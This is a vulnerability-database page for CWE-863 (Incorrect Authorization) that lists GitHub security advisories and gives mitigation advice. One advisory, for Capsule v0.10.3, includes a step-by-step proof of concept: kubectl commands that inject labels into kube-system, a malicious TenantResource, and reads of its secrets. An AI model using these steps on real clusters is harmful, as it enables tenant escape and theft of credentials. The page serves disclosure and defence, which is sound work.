CWE-863
Allowed-with-ReviewIncorrect Authorization
Abstraction: Class · Status: Incomplete
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
5540 vulnerabilities reference this CWE, most recent first.
GHSA-FC3Q-VG8H-QRFP
Vulnerability from github – Published: 2026-02-24 21:31 – Updated: 2026-02-25 15:31A permission cache poisoning vulnerability in Devolutions Server allows authenticated users to bypass permissions to access entries.This issue affects Devolutions Server: before 2025.3.15.
{
"affected": [],
"aliases": [
"CVE-2026-1768"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-24T20:27:46Z",
"severity": "MODERATE"
},
"details": "A permission cache poisoning vulnerability in Devolutions Server allows authenticated users to bypass permissions to access entries.This issue affects Devolutions Server: before 2025.3.15.",
"id": "GHSA-fc3q-vg8h-qrfp",
"modified": "2026-02-25T15:31:37Z",
"published": "2026-02-24T21:31:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1768"
},
{
"type": "WEB",
"url": "https://devolutions.net/security/advisories/DEVO-2026-0004"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FC43-XQX9-FHVJ
Vulnerability from github – Published: 2022-03-08 00:00 – Updated: 2022-03-17 00:02Improper Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.
{
"affected": [],
"aliases": [
"CVE-2022-0756"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-862",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-07T13:15:00Z",
"severity": "MODERATE"
},
"details": "Improper Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.",
"id": "GHSA-fc43-xqx9-fhvj",
"modified": "2022-03-17T00:02:51Z",
"published": "2022-03-08T00:00:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0756"
},
{
"type": "WEB",
"url": "https://github.com/salesagility/suitecrm/commit/e93b269f637de313f45b32c58cef5ec012a34f58"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/55164a63-62e4-4fb6-b4ca-87eca14f6f31"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FC67-6VC9-R6M2
Vulnerability from github – Published: 2023-06-27 00:30 – Updated: 2024-04-04 05:11An exposed dangerous function vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate privileges and write an arbitrary value to specific Trend Micro agent subkeys on affected installations.
Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
This is a similar, but not identical vulnerability as CVE-2023-34146 and CVE-2023-34147.
{
"affected": [],
"aliases": [
"CVE-2023-34148"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-26T22:15:11Z",
"severity": "HIGH"
},
"details": "An exposed dangerous function vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate privileges and write an arbitrary value to specific Trend Micro agent subkeys on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-34146 and CVE-2023-34147.",
"id": "GHSA-fc67-6vc9-r6m2",
"modified": "2024-04-04T05:11:38Z",
"published": "2023-06-27T00:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34148"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/dcx/s/solution/000293322?language=en_US"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-834"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FC6R-7W85-4VGG
Vulnerability from github – Published: 2025-10-03 12:33 – Updated: 2025-10-08 15:32A regular Zabbix user with no permission to the Monitoring -> Problems view is still able to call the problem.view.refresh action and therefore still retrieve a list of active problems.
{
"affected": [],
"aliases": [
"CVE-2025-49641"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-03T12:15:44Z",
"severity": "MODERATE"
},
"details": "A regular Zabbix user with no permission to the Monitoring -\u003e Problems view is still able to call the problem.view.refresh action and therefore still retrieve a list of active problems.",
"id": "GHSA-fc6r-7w85-4vgg",
"modified": "2025-10-08T15:32:26Z",
"published": "2025-10-03T12:33:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49641"
},
{
"type": "WEB",
"url": "https://support.zabbix.com/browse/ZBX-27063"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FC7R-9282-58JR
Vulnerability from github – Published: 2023-08-22 21:30 – Updated: 2024-04-04 07:08In Cacti 1.2.19, there is an authentication bypass in the web login functionality because of improper validation in the PHP code: cacti_ldap_auth() allows a zero as the password.
{
"affected": [],
"aliases": [
"CVE-2022-48538"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-22T19:16:31Z",
"severity": "MODERATE"
},
"details": "In Cacti 1.2.19, there is an authentication bypass in the web login functionality because of improper validation in the PHP code: cacti_ldap_auth() allows a zero as the password.",
"id": "GHSA-fc7r-9282-58jr",
"modified": "2024-04-04T07:08:16Z",
"published": "2023-08-22T21:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48538"
},
{
"type": "WEB",
"url": "https://github.com/Cacti/cacti/issues/5189"
},
{
"type": "WEB",
"url": "https://docs.cacti.net/Settings-Auth-LDAP.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FC7V-85Q5-FV3M
Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2022-05-13 01:50Inova Partner 5.0.5-RELEASE, Build 0510-0906 and earlier allows authenticated users authorization bypass and data manipulation in certain functions.
{
"affected": [],
"aliases": [
"CVE-2018-15692"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-11-16T18:29:00Z",
"severity": "MODERATE"
},
"details": "Inova Partner 5.0.5-RELEASE, Build 0510-0906 and earlier allows authenticated users authorization bypass and data manipulation in certain functions.",
"id": "GHSA-fc7v-85q5-fv3m",
"modified": "2022-05-13T01:50:11Z",
"published": "2022-05-13T01:50:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15692"
},
{
"type": "WEB",
"url": "https://www.kpmg.de/noindex/advisories/KPMG-2018-002.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FCMM-JQ9F-CC5P
Vulnerability from github – Published: 2022-05-12 00:01 – Updated: 2022-05-19 00:00An improper authorization issue has been discovered in GitLab CE/EE affecting all versions prior to 14.8.6, all versions from 14.9.0 prior to 14.9.4, and 14.10.0, allowing Guest project members to access trace log of jobs when it is enabled
{
"affected": [],
"aliases": [
"CVE-2022-1124"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-11T15:15:00Z",
"severity": "MODERATE"
},
"details": "An improper authorization issue has been discovered in GitLab CE/EE affecting all versions prior to 14.8.6, all versions from 14.9.0 prior to 14.9.4, and 14.10.0, allowing Guest project members to access trace log of jobs when it is enabled",
"id": "GHSA-fcmm-jq9f-cc5p",
"modified": "2022-05-19T00:00:17Z",
"published": "2022-05-12T00:01:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1124"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1113405"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1124.json"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/323552"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FCPM-6MXQ-M5VV
Vulnerability from github – Published: 2025-08-18 21:00 – Updated: 2025-08-29 20:35Summary
A namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.
Details
The vulnerability exists in the namespace validation webhook logic located in pkg/webhook/namespace/validation/patch.go:60-77. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:
if label, ok := ns.Labels[ln]; ok {
// Only checks permissions when namespace has tenant label
if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {
response := admission.Denied(e)
return &response
}
}
return nil // Critical issue: allows operation if no tenant label exists
Root Cause Analysis:
1. Missing Default Protection: System namespaces (kube-system, default, capsule-system) do not have the capsule.clastix.io/tenant label by default
2. Bypass Logic: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant
3. Unrestricted Label Injection: Authenticated users can inject arbitrary labels into unprotected namespaces
Attack Vector Path:
Label Injection (user-controlled) → Namespace Selector (system matching) → TenantResource/Quota Check (authorization bypass) → Cross-tenant Resource Access
This mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation:
- CVE-2024-39690: ownerReference(user-controlled) → tenant.Status.Namespaces(system state) → quota/permission check(auth policy) → namespace hijacking
- This vulnerability: Label injection(user-controlled) → Namespace selector(system matching) → TenantResource/Quota check(auth policy) → cross-tenant resource access
PoC
Prerequisites: - Minikube cluster with Capsule v0.10.3 installed - Authenticated tenant user with basic RBAC permissions
Step 1: Environment Setup
# Install Minikube and Capsule
minikube start
helm repo add projectcapsule https://projectcapsule.github.io/charts
helm install capsule projectcapsule/capsule -n capsule-system --create-namespace
# Create tenant and user
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
name: tenant1
spec:
owners:
- name: alice
kind: User
EOF
# Create user certificate and kubeconfig (using provided script)
./create-user-minikube.sh alice tenant1
Step 2: Label Injection Attack
# Switch to attacker context
export KUBECONFIG=alice-tenant1.kubeconfig
# Inject malicious labels into system namespaces
kubectl patch namespace kube-system --type='json' -p='[
{
"op": "add",
"path": "/metadata/labels/malicious-label",
"value": "attack-value"
}
]'
# Verify injection success
kubectl get namespace kube-system --show-labels
Step 3: Exploitation via TenantResource
# Create attacker-controlled namespace
kubectl create namespace alice-attack
# Create malicious TenantResource targeting injected labels
cat <<EOF | kubectl apply -f -
apiVersion: capsule.clastix.io/v1beta2
kind: TenantResource
metadata:
name: malicious-resource
namespace: alice-attack
spec:
resyncPeriod: 60s
resources:
- namespaceSelector:
matchLabels:
malicious-label: "attack-value"
EOF
# Verify cross-tenant access
kubectl get tenantresource -n alice-attack malicious-resource -o yaml
Step 4: Verification of Impact
# Check if system namespace resources are now accessible
export KUBECONFIG=~/.kube/config
kubectl get namespaces -l "malicious-label=attack-value"
# Output shows: kube-system (and potentially other injected namespaces)
# Check for potential resource replication/access
kubectl get all -n kube-system
kubectl get secrets -n kube-system
kubectl get configmaps -n kube-system
Automated Testing Script: A complete vulnerability verification script is available that tests: - Label injection into multiple system namespaces - TenantResource exploitation - Cross-tenant resource access verification - Impact assessment and cleanup
Impact
Vulnerability Type: Authorization Bypass / Privilege Escalation
Who is Impacted: - Multi-tenant Kubernetes clusters using Capsule v0.10.3 and potentially earlier versions - Organizations relying on Capsule for tenant isolation and resource governance - Cloud service providers offering Kubernetes-as-a-Service with Capsule-based multi-tenancy
Security Impact: 1. Multi-tenant Isolation Bypass: Attackers can access resources from other tenants or system namespaces 2. Privilege Escalation: Tenant users can gain access to cluster-wide resources and sensitive system components 3. Data Exfiltration: Potential access to secrets, configmaps, and other sensitive data in system namespaces 4. Resource Quota Bypass: Ability to consume resources outside assigned tenant boundaries 5. Policy Circumvention: Bypass network policies, security policies, and other tenant-level restrictions
Real-world Exploitation Scenarios: - Access to kube-system secrets containing cluster certificates and service account tokens - Modification or replication of critical system configurations - Cross-tenant data access in shared clusters - Potential cluster-wide compromise through system namespace access
Severity: High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/projectcapsule/capsule"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55205"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-18T21:00:36Z",
"nvd_published_at": "2025-08-18T17:15:30Z",
"severity": "CRITICAL"
},
"details": "### Summary\nA namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.\n\n### Details\nThe vulnerability exists in the namespace validation webhook logic located in `pkg/webhook/namespace/validation/patch.go:60-77`. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:\n\n```go\nif label, ok := ns.Labels[ln]; ok {\n // Only checks permissions when namespace has tenant label\n if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {\n response := admission.Denied(e)\n return \u0026response\n }\n}\n\nreturn nil // Critical issue: allows operation if no tenant label exists\n```\n\n**Root Cause Analysis:**\n1. **Missing Default Protection**: System namespaces (kube-system, default, capsule-system) do not have the `capsule.clastix.io/tenant` label by default\n2. **Bypass Logic**: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant\n3. **Unrestricted Label Injection**: Authenticated users can inject arbitrary labels into unprotected namespaces\n\n**Attack Vector Path:**\n```\nLabel Injection (user-controlled) \u2192 Namespace Selector (system matching) \u2192 TenantResource/Quota Check (authorization bypass) \u2192 Cross-tenant Resource Access\n```\n\nThis mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation:\n- **CVE-2024-39690**: `ownerReference(user-controlled) \u2192 tenant.Status.Namespaces(system state) \u2192 quota/permission check(auth policy) \u2192 namespace hijacking`\n- **This vulnerability**: `Label injection(user-controlled) \u2192 Namespace selector(system matching) \u2192 TenantResource/Quota check(auth policy) \u2192 cross-tenant resource access`\n\n### PoC\n**Prerequisites:**\n- Minikube cluster with Capsule v0.10.3 installed\n- Authenticated tenant user with basic RBAC permissions\n\n**Step 1: Environment Setup**\n```bash\n# Install Minikube and Capsule\nminikube start\nhelm repo add projectcapsule https://projectcapsule.github.io/charts\nhelm install capsule projectcapsule/capsule -n capsule-system --create-namespace\n\n# Create tenant and user\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n name: tenant1\nspec:\n owners:\n - name: alice\n kind: User\nEOF\n\n# Create user certificate and kubeconfig (using provided script)\n./create-user-minikube.sh alice tenant1\n```\n\n**Step 2: Label Injection Attack**\n```bash\n# Switch to attacker context\nexport KUBECONFIG=alice-tenant1.kubeconfig\n\n# Inject malicious labels into system namespaces\nkubectl patch namespace kube-system --type=\u0027json\u0027 -p=\u0027[\n {\n \"op\": \"add\",\n \"path\": \"/metadata/labels/malicious-label\",\n \"value\": \"attack-value\"\n }\n]\u0027\n\n# Verify injection success\nkubectl get namespace kube-system --show-labels\n```\n\n**Step 3: Exploitation via TenantResource**\n```bash\n# Create attacker-controlled namespace\nkubectl create namespace alice-attack\n\n# Create malicious TenantResource targeting injected labels\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: capsule.clastix.io/v1beta2\nkind: TenantResource\nmetadata:\n name: malicious-resource\n namespace: alice-attack\nspec:\n resyncPeriod: 60s\n resources:\n - namespaceSelector:\n matchLabels:\n malicious-label: \"attack-value\"\nEOF\n\n# Verify cross-tenant access\nkubectl get tenantresource -n alice-attack malicious-resource -o yaml\n```\n\n**Step 4: Verification of Impact**\n```bash\n# Check if system namespace resources are now accessible\nexport KUBECONFIG=~/.kube/config\nkubectl get namespaces -l \"malicious-label=attack-value\"\n# Output shows: kube-system (and potentially other injected namespaces)\n\n# Check for potential resource replication/access\nkubectl get all -n kube-system\nkubectl get secrets -n kube-system\nkubectl get configmaps -n kube-system\n```\n\n**Automated Testing Script:**\nA complete vulnerability verification script is available that tests:\n- Label injection into multiple system namespaces\n- TenantResource exploitation\n- Cross-tenant resource access verification\n- Impact assessment and cleanup\n\n### Impact\n**Vulnerability Type:** Authorization Bypass / Privilege Escalation\n\n**Who is Impacted:**\n- **Multi-tenant Kubernetes clusters** using Capsule v0.10.3 and potentially earlier versions\n- **Organizations relying on Capsule** for tenant isolation and resource governance\n- **Cloud service providers** offering Kubernetes-as-a-Service with Capsule-based multi-tenancy\n\n**Security Impact:**\n1. **Multi-tenant Isolation Bypass**: Attackers can access resources from other tenants or system namespaces\n2. **Privilege Escalation**: Tenant users can gain access to cluster-wide resources and sensitive system components\n3. **Data Exfiltration**: Potential access to secrets, configmaps, and other sensitive data in system namespaces\n4. **Resource Quota Bypass**: Ability to consume resources outside assigned tenant boundaries\n5. **Policy Circumvention**: Bypass network policies, security policies, and other tenant-level restrictions\n\n**Real-world Exploitation Scenarios:**\n- Access to kube-system secrets containing cluster certificates and service account tokens\n- Modification or replication of critical system configurations\n- Cross-tenant data access in shared clusters\n- Potential cluster-wide compromise through system namespace access\n\n**Severity:** High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.",
"id": "GHSA-fcpm-6mxq-m5vv",
"modified": "2025-08-29T20:35:24Z",
"published": "2025-08-18T21:00:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55205"
},
{
"type": "WEB",
"url": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e"
},
{
"type": "PACKAGE",
"url": "https://github.com/projectcapsule/capsule"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3893"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Capsule tenant owners with \"patch namespace\" permission can hijack system namespaces label"
}
GHSA-FCRV-Q4XW-6CRP
Vulnerability from github – Published: 2024-08-30 18:30 – Updated: 2024-09-04 21:30Zohocorp ManageEngine Endpoint Central affected by Incorrect authorization vulnerability while isolating the devices.This issue affects Endpoint Central: before 11.3.2406.08 and before 11.3.2400.15
{
"affected": [],
"aliases": [
"CVE-2024-38868"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-30T18:15:06Z",
"severity": "HIGH"
},
"details": "Zohocorp ManageEngine Endpoint Central affected by\u00a0Incorrect authorization vulnerability while isolating the devices.This issue affects Endpoint Central: before 11.3.2406.08 and before 11.3.2400.15",
"id": "GHSA-fcrv-q4xw-6crp",
"modified": "2024-09-04T21:30:31Z",
"published": "2024-08-30T18:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38868"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/products/desktop-central/security-updates-ngav.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-FF37-HV4Q-764F
Vulnerability from github – Published: 2022-05-24 16:51 – Updated: 2023-02-28 15:30In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, a hidden action=9 feature in filemanager2.php allows attackers to execute a shell command, i.e., obtain a reverse shell with user privilege.
{
"affected": [],
"aliases": [
"CVE-2019-13386"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-26T13:15:00Z",
"severity": "HIGH"
},
"details": "In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, a hidden action=9 feature in filemanager2.php allows attackers to execute a shell command, i.e., obtain a reverse shell with user privilege.",
"id": "GHSA-ff37-hv4q-764f",
"modified": "2023-02-28T15:30:23Z",
"published": "2022-05-24T16:51:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13386"
},
{
"type": "WEB",
"url": "https://centos-webpanel.com/changelog-cwp7"
},
{
"type": "WEB",
"url": "https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13386.md"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/153876/CentOS-Control-Web-Panel-0.9.8.836-Remote-Command-Execution.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
No CAPEC attack patterns related to this CWE.